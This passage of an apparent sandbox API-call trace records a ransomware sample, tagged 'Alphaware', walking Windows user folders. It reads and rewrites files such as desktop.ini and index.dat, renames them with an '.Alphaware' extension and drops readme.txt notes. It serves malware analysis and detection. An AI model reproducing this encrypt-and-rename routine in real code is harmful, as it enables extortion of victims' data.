(dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0094.405] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a77e160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248)) returned 1 [0094.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0094.406] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\libraries\\desktop.ini.alphaware")) returned 1 [0094.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0094.408] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\libraries\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.409] GetFileType (hFile=0x250) returned 0x1 [0094.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0094.409] GetFileType (hFile=0x250) returned 0x1 [0094.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x7958db70, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8a77e160, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a77e160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8a77e160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e819100, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e81b810, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms", cAlternateFileName="DOCUME~1.LIB")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e873650, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e875d60, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms", cAlternateFileName="MUSIC~1.LIB")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e840200, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e842910, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xdf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a77e160, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a77e160, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a77e160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e8624e0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e864bf0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xde2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7e8624e0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e864bf0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0xde2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos.library-ms", cAlternateFileName="VIDEOS~1.LIB")) returned 0 [0094.412] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.413] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.413] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.414] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.414] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xaeeef71c, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.414] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.414] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.414] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.414] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.415] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.415] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.415] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.415] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.415] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x75cc2be0, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x75cc2be0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x74e7e660, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0094.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0094.416] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0094.416] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0094.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.417] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat", dwFileAttributes=0x80) returned 1 [0094.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0094.419] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), fInfoLevelId=0x0, lpFileInformation=0x256b980 | out: lpFileInformation=0x256b980*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x75cc2be0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x74e7e660, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0094.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0094.420] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0094.420] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0094.420] GetFileType (hFile=0x250) returned 0x1 [0094.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0094.420] GetFileType (hFile=0x250) returned 0x1 [0094.420] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x8000 [0094.421] ReadFile (in: hFile=0x250, lpBuffer=0x256bc18, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x256bc18*, lpNumberOfBytesRead=0x23e958*=0x8000, lpOverlapped=0x0) returned 1 [0094.423] CloseHandle (hObject=0x250) returned 1 [0094.451] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0094.452] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.453] GetFileType (hFile=0x250) returned 0x1 [0094.453] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0094.453] GetFileType (hFile=0x250) returned 0x1 [0094.455] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0094.455] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75cc2be0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a7f0580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xab88)) returned 1 [0094.455] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0094.456] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\index.dat.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\privacie\\index.dat.alphaware")) returned 1 [0094.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0094.456] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\privacie\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0094.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0094.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0094.458] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8a7f0580, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a7f0580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.458] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75cc2be0, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x75cc2be0, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x8a7f0580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xab88, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat.Alphaware", cAlternateFileName="INDEXD~1.ALP")) returned 1 [0094.458] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0094.459] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a7f0580, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a7f0580, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a7f0580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0094.459] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8a7f0580, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8a7f0580, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8a7f0580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0094.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0094.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0094.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0094.459] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.459] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0094.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0094.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0094.459] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.460] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x79567a10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79567a10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0094.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0094.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0094.460] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xd1762d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1762d60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.460] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb1e820, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb1e820, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfb1e820, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2df, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Cj6mvIu4.lnk", cAlternateFileName="-CJ6MV~1.LNK")) returned 1 [0094.460] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ec1da0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ec1da0, 